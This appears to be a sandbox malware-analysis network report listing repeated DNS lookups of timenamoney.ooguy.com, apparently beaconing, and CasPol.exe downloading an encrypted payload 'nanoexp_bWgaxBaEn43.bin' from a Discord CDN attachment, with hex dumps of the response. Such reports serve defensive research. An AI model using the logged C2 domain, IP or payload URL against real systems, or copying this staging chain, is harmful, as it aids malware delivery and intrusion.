                                                                                      May 26, 2022 22:58:50.673515081 CEST192.168.11.208.8.8.80x3fd0Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:56.796745062 CEST192.168.11.208.8.8.80x8584Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:03.044397116 CEST192.168.11.208.8.8.80xdef1Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:09.314876080 CEST192.168.11.208.8.8.80xaffbStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:15.620628119 CEST192.168.11.208.8.8.80xc2d3Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:21.887063980 CEST192.168.11.208.8.8.80x1515Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:27.961395025 CEST192.168.11.208.8.8.80xc95fStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:34.132642031 CEST192.168.11.208.8.8.80x9acdStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:40.239417076 CEST192.168.11.208.8.8.80x559Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:46.565993071 CEST192.168.11.208.8.8.80xc4c1Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:52.736718893 CEST192.168.11.208.8.8.80xc6Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:58.798115015 CEST192.168.11.208.8.8.80x4d8aStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:04.921264887 CEST192.168.11.208.8.8.80x3d98Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:11.045850039 CEST192.168.11.208.8.8.80xbddaStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:17.185695887 CEST192.168.11.208.8.8.80x3874Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:23.418376923 CEST192.168.11.208.8.8.80x67f3Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:29.525124073 CEST192.168.11.208.8.8.80x51a7Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:35.655673981 CEST192.168.11.208.8.8.80xde6Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:41.772674084 CEST192.168.11.208.8.8.80x4c97Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:47.911969900 CEST192.168.11.208.8.8.80x58f7Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:54.066659927 CEST192.168.11.208.8.8.80x2c4bStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:00.143632889 CEST192.168.11.208.8.8.80x2640Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:06.314536095 CEST192.168.11.208.8.8.80x95ceStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:12.437952995 CEST192.168.11.208.8.8.80x423bStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:18.568036079 CEST192.168.11.208.8.8.80x9c89Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:24.687258959 CEST192.168.11.208.8.8.80x5b67Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:30.761780977 CEST192.168.11.208.8.8.80xc00fStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:36.932429075 CEST192.168.11.208.8.8.80x8eacStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:43.025840044 CEST192.168.11.208.8.8.80x1f0aStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:49.461431026 CEST192.168.11.208.8.8.80xc6d6Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:55.631266117 CEST192.168.11.208.8.8.80x5440Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:01.723764896 CEST192.168.11.208.8.8.80x1356Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:07.836009026 CEST192.168.11.208.8.8.80x6feaStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:13.970880032 CEST192.168.11.208.8.8.80x7db1Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:20.081634998 CEST192.168.11.208.8.8.80xd8f5Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:26.207834005 CEST192.168.11.208.8.8.80x2555Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:32.328444004 CEST192.168.11.208.8.8.80x6097Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:37.926033974 CEST192.168.11.208.8.8.80xfa72Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:44.027009964 CEST192.168.11.208.8.8.80xeea2Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:50.213300943 CEST192.168.11.208.8.8.80xf5b6Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:56.289926052 CEST192.168.11.208.8.8.80x478fStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:02.508759975 CEST192.168.11.208.8.8.80xb6c2Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:08.634332895 CEST192.168.11.208.8.8.80x1c31Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:14.755961895 CEST192.168.11.208.8.8.80xca7dStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:20.878443956 CEST192.168.11.208.8.8.80x321aStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:27.003328085 CEST192.168.11.208.8.8.80x8b77Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:33.125438929 CEST192.168.11.208.8.8.80xcd8dStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:39.257931948 CEST192.168.11.208.8.8.80xb340Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:45.420042992 CEST192.168.11.208.8.8.80x33bfStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:51.497894049 CEST192.168.11.208.8.8.80xcb80Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:57.619930983 CEST192.168.11.208.8.8.80x1b80Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:04:03.870403051 CEST192.168.11.208.8.8.80x924dStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:04:10.195959091 CEST192.168.11.208.8.8.80x9bd4Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      May 26, 2022 22:56:17.952687979 CEST1.1.1.1192.168.11.200xa78bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:17.952687979 CEST1.1.1.1192.168.11.200xa78bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:17.952687979 CEST1.1.1.1192.168.11.200xa78bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:17.952687979 CEST1.1.1.1192.168.11.200xa78bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:17.952687979 CEST1.1.1.1192.168.11.200xa78bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:19.502645016 CEST8.8.8.8192.168.11.200x25d0No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:25.915883064 CEST8.8.8.8192.168.11.200x58c5No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:32.275470972 CEST8.8.8.8192.168.11.200xc137No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:38.598752975 CEST8.8.8.8192.168.11.200x9572No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:44.889226913 CEST8.8.8.8192.168.11.200xfe65No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:51.286528111 CEST8.8.8.8192.168.11.200x3583No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:57.564409018 CEST8.8.8.8192.168.11.200xcb10No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:03.948545933 CEST8.8.8.8192.168.11.200xa00eNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:10.365535975 CEST8.8.8.8192.168.11.200x410bNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:16.592194080 CEST8.8.8.8192.168.11.200xccfeNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:23.951476097 CEST8.8.8.8192.168.11.200xcf99No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:30.153330088 CEST8.8.8.8192.168.11.200x48dcNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:36.458362103 CEST8.8.8.8192.168.11.200x2682No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:42.775795937 CEST8.8.8.8192.168.11.200x2648No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:49.079962015 CEST8.8.8.8192.168.11.200xb6b7No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:55.396287918 CEST8.8.8.8192.168.11.200x66dbNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:02.722851038 CEST8.8.8.8192.168.11.200xe7f0No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:08.801352024 CEST8.8.8.8192.168.11.200x7b6eNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:14.970187902 CEST8.8.8.8192.168.11.200xa9eNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:19.884291887 CEST8.8.8.8192.168.11.200xa8b4No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:25.967468023 CEST8.8.8.8192.168.11.200x1405No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:32.140337944 CEST8.8.8.8192.168.11.200x5361No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:38.373121977 CEST8.8.8.8192.168.11.200xd343No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:44.594331026 CEST8.8.8.8192.168.11.200x9599No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:50.684278965 CEST8.8.8.8192.168.11.200x3fd0No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:56.924204111 CEST8.8.8.8192.168.11.200x8584No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:03.204742908 CEST8.8.8.8192.168.11.200xdef1No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:09.475416899 CEST8.8.8.8192.168.11.200xaffbNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:15.750709057 CEST8.8.8.8192.168.11.200xc2d3No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:21.897727013 CEST8.8.8.8192.168.11.200x1515No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:27.969963074 CEST8.8.8.8192.168.11.200xc95fNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:34.143362999 CEST8.8.8.8192.168.11.200x9acdNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:40.408190966 CEST8.8.8.8192.168.11.200x559No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:46.574675083 CEST8.8.8.8192.168.11.200xc4c1No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:52.747231960 CEST8.8.8.8192.168.11.200xc6No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:59:58.808669090 CEST8.8.8.8192.168.11.200x4d8aNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:04.931792974 CEST8.8.8.8192.168.11.200x3d98No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:11.056566954 CEST8.8.8.8192.168.11.200xbddaNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:17.313097954 CEST8.8.8.8192.168.11.200x3874No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:23.427269936 CEST8.8.8.8192.168.11.200x67f3No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:29.534392118 CEST8.8.8.8192.168.11.200x51a7No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:35.663703918 CEST8.8.8.8192.168.11.200xde6No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:41.783401966 CEST8.8.8.8192.168.11.200x4c97No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:47.920675039 CEST8.8.8.8192.168.11.200x58f7No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:00:54.076555014 CEST8.8.8.8192.168.11.200x2c4bNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:00.154145002 CEST8.8.8.8192.168.11.200x2640No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:06.323120117 CEST8.8.8.8192.168.11.200x95ceNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:12.448194981 CEST8.8.8.8192.168.11.200x423bNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:18.576674938 CEST8.8.8.8192.168.11.200x9c89No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:24.695985079 CEST8.8.8.8192.168.11.200x5b67No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:30.772237062 CEST8.8.8.8192.168.11.200xc00fNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:36.942620993 CEST8.8.8.8192.168.11.200x8eacNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:43.156709909 CEST8.8.8.8192.168.11.200x1f0aNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:49.470392942 CEST8.8.8.8192.168.11.200xc6d6No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:01:55.640096903 CEST8.8.8.8192.168.11.200x5440No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:01.734304905 CEST8.8.8.8192.168.11.200x1356No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:07.846244097 CEST8.8.8.8192.168.11.200x6feaNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:13.979751110 CEST8.8.8.8192.168.11.200x7db1No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:20.092257977 CEST8.8.8.8192.168.11.200xd8f5No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:26.218049049 CEST8.8.8.8192.168.11.200x2555No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:32.498123884 CEST8.8.8.8192.168.11.200x6097No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:37.934736967 CEST8.8.8.8192.168.11.200xfa72No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:44.036978960 CEST8.8.8.8192.168.11.200xeea2No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:50.223522902 CEST8.8.8.8192.168.11.200xf5b6No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:02:56.419696093 CEST8.8.8.8192.168.11.200x478fNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:02.518985033 CEST8.8.8.8192.168.11.200xb6c2No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:08.643898010 CEST8.8.8.8192.168.11.200x1c31No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:14.766194105 CEST8.8.8.8192.168.11.200xca7dNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:20.888705969 CEST8.8.8.8192.168.11.200x321aNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:27.013995886 CEST8.8.8.8192.168.11.200x8b77No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:33.133816957 CEST8.8.8.8192.168.11.200xcd8dNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:39.268352032 CEST8.8.8.8192.168.11.200xb340No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:45.429908037 CEST8.8.8.8192.168.11.200x33bfNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:51.506457090 CEST8.8.8.8192.168.11.200xcb80No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:03:57.787252903 CEST8.8.8.8192.168.11.200x1b80No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:04:04.032357931 CEST8.8.8.8192.168.11.200x924dNo error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      May 26, 2022 23:04:10.354782104 CEST8.8.8.8192.168.11.200x9bd4No error (0)timenamoney.ooguy.com23.105.131.228A (IP address)IN (0x0001)
                                                                                      • cdn.discordapp.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.11.2049767162.159.129.233443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2022-05-26 20:56:18 UTC0OUTGET /attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: cdn.discordapp.com
                                                                                      Cache-Control: no-cache
                                                                                      2022-05-26 20:56:18 UTC0INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 May 2022 20:56:18 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 207424
                                                                                      Connection: close
                                                                                      CF-Ray: 71196aa97bbf9a2d-FRA
                                                                                      Accept-Ranges: bytes
                                                                                      Age: 4269
                                                                                      Cache-Control: public, max-age=31536000
                                                                                      Content-Disposition: attachment;%20filename=nanoexp_bWgaxBaEn43.bin
                                                                                      ETag: "4401cfd6fed2eca3fd7146aa862b9f7e"
                                                                                      Expires: Fri, 26 May 2023 20:56:18 GMT
                                                                                      Last-Modified: Thu, 26 May 2022 16:37:58 GMT
                                                                                      Vary: Accept-Encoding
                                                                                      CF-Cache-Status: HIT
                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                      x-goog-generation: 1653583078387891
                                                                                      x-goog-hash: crc32c=VC97oA==
                                                                                      x-goog-hash: md5=RAHP1v7S7KP9cUaqhiuffg==
                                                                                      x-goog-metageneration: 1
                                                                                      x-goog-storage-class: STANDARD
                                                                                      x-goog-stored-content-encoding: identity
                                                                                      x-goog-stored-content-length: 207424
                                                                                      X-GUploader-UploadID: ADPycdvS8aZ50762N6BbuBOdDzQmTd3MHTjkeprrrmZHA6Lgpm206T8M8DXSYxTFynBwVZPSqWk7TeZfyiX8Kac74hna0Q
                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dPoGAqM7VNu9jiwggaVGvdEVRbolQhWYk3I3sdtQ%2B8oIiCvSlBiA2hqXRvwmbCwya%2BNVp5LCx9c7OahYkXzAI7qdH%2F9EkvItziIHhTGpGOL63MchDJuY3NKxkACuNEzWs3T8rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      2022-05-26 20:56:18 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                      2022-05-26 20:56:18 UTC1INData Raw: 6f 78 83 d0 82 26 65 4f 07 78 fe ee b5 95 a4 26 57 9b 65 5a 8d e2 9e bc 09 76 14 ae ff 79 ee 7e d5 62 5a b4 72 a6 49 a0 3f 8b bc 0b e8 74 52 88 de 2c 3d 1c 4b 00 5b 71 5f ff ef 8f 47 49 7a 2b f8 cf 6c 8c 57 b3 87 dc 56 de 58 8b 5f 39 11 c7 ee 61 16 13 b4 b6 a4 1c 46 a7 b6 b5 83 a3 7a 0e 6b 1a a2 31 b2 7a e5 30 99 eb 78 fb 90 39 ed dc 46 ac b5 15 c6 5b ac 9c b5 54 12 e9 1e 39 82 d6 a8 dd 49 45 9b ac 76 80 a6 37 f2 4f 52 85 ea 7f 9f 53 1c 47 65 74 4c 02 58 02 d8 cc e8 83 74 44 82 ad 5a 0d 97 33 bc 76 9c f8 8d 89 37 5e 54 39 9b fd d5 dd 6b 90 fc dc 51 79 20 d2 7b 57 ae a9 26 38 f9 63 c9 b6 f0 97 51 4c 05 2d b4 f8 5e 36 9d be 0d 36 95 b8 f1 4f 19 73 8b 2f 6c 60 80 19 de b7 c6 99 d1 32 a3 18 f1 5d 9a 98 b1 57 79 9b 5a 40 67 fe ec b9 9d 9f 37 db b3 02 62 af 21
                                                                                      Data Ascii: ox&eOx&WeZvy~bZrI?tR,=K[q_GIz+lWVX_9aFzk1z0x9F[T9IEv7ORSGetLXtDZ3v7^T9kQy {W&8cQL-^66Os/l`2]WyZ@g7b!
                                                                                      2022-05-26 20:56:18 UTC2INData Raw: e7 63 c1 52 48 f8 dd 3f 12 9d 7a ff ee 07 1c 69 75 f5 13 81 f8 44 7d e7 52 6a 5f 7a fb 75 10 0d 68 08 bf 15 b9 11 8c 04 a1 34 d9 d2 f3 ee 43 00 63 2c 5e 14 55 56 58 50 5a 82 92 c8 6f 44 38 99 1f e5 e4 42 d1 a7 b7 0c 1f 25 df c7 dd 9c 99 20 69 e3 78 f5 3a 43 ba 81 0a 35 f3 e4 ad e1 b3 38 91 dc 30 1a 7a 82 41 5e 9c 69 6d 9c d6 9b 81 74 0d d3 0d a0 34 de 42 1f 05 a4 a7 0f 98 58 c8 e7 e3 79 11 27 2f 8f 25 14 ee ff 16 21 63 61 8f 37 c6 47 30 26 fc 98 43 c6 2d b9 e3 fc db dd c1 5a b5 f2 84 d7 95 16 9d db 7a e4 6a 31 07 5b 77 21 a5 bf 3d a6 21 7d 9d 7a a9 9f 11 f8 04 d4 51 1f 8a 4e da 8e bf 7c 9a e3 b6 ab c6 5d 80 1a b8 5f 07 c5 06 1b 5f 6a 6e 95 bf 56 15 fb 03 3b 7f da 9c 91 fb 5c 45 a3 69 3a c4 08 6e 2b ee af cc fe 96 93 bd d5 0b 25 d6 12 6d f8 5d a7 cf 91 e0
                                                                                      Data Ascii: cRH?ziuD}Rj_zuh4Cc,^UVXPZoD8B% ix:C580zA^imt4BXy'/%!ca7G0&C-Zzj1[w!=!}zQN|]__jnV;\Ei:n+%m]
                                                                                      2022-05-26 20:56:18 UTC4INData Raw: ff 4e 18 ae 8a 40 08 a8 81 13 c8 e4 dd e7 d8 32 a3 1c 4f a9 e5 92 b1 77 7d b7 5f 68 00 fe ec bf f5 18 37 fb b5 dc 57 d3 62 41 bf d1 0b 67 aa 6f 45 fa 7e c3 cc 24 72 62 c5 0b cf e4 f6 e2 fd 7d 4e 0f f4 dd 6e 65 7b 8b d0 0c a3 08 32 f1 9e fd 85 e9 cf 33 05 5c 6b 9e 73 d5 b6 b0 44 a2 4f 81 30 96 dd 0f 38 e8 c3 b6 6a 74 f4 66 4c de 01 1b b2 f8 2a 44 15 6e 77 58 cd b6 a1 69 4d c4 55 e2 b5 83 30 ec ee 6f e7 12 37 c9 c9 f3 65 93 b1 5a c8 1b 1e 54 39 74 95 89 d1 14 da 7a ae 22 43 96 5c c9 b0 cb 62 d1 b1 81 42 41 cb d5 e1 5d 1b c9 30 ef b7 df 4c 1e 36 88 41 15 38 e1 6e 4b 79 05 af 5e cf d0 2a f4 a7 d2 44 32 c6 1a 4e ac a3 c2 0d 81 ca bc af f5 c2 65 0e f8 f1 05 95 fd b9 2f 5d 4c a6 3d db ea a3 25 5a 11 c9 ff 50 43 85 31 a8 49 c5 30 ed db 8e 22 fd 79 2f fc e4 c4 49
                                                                                      Data Ascii: N@2Ow}_h7WbAgoE~$rb}Nne{23\ksDO08jtfL*DnwXiMU0o7eZT9tz"C\bBA]0L6A8nKy^*D2Ne/]L=%ZPC1I0"y/I
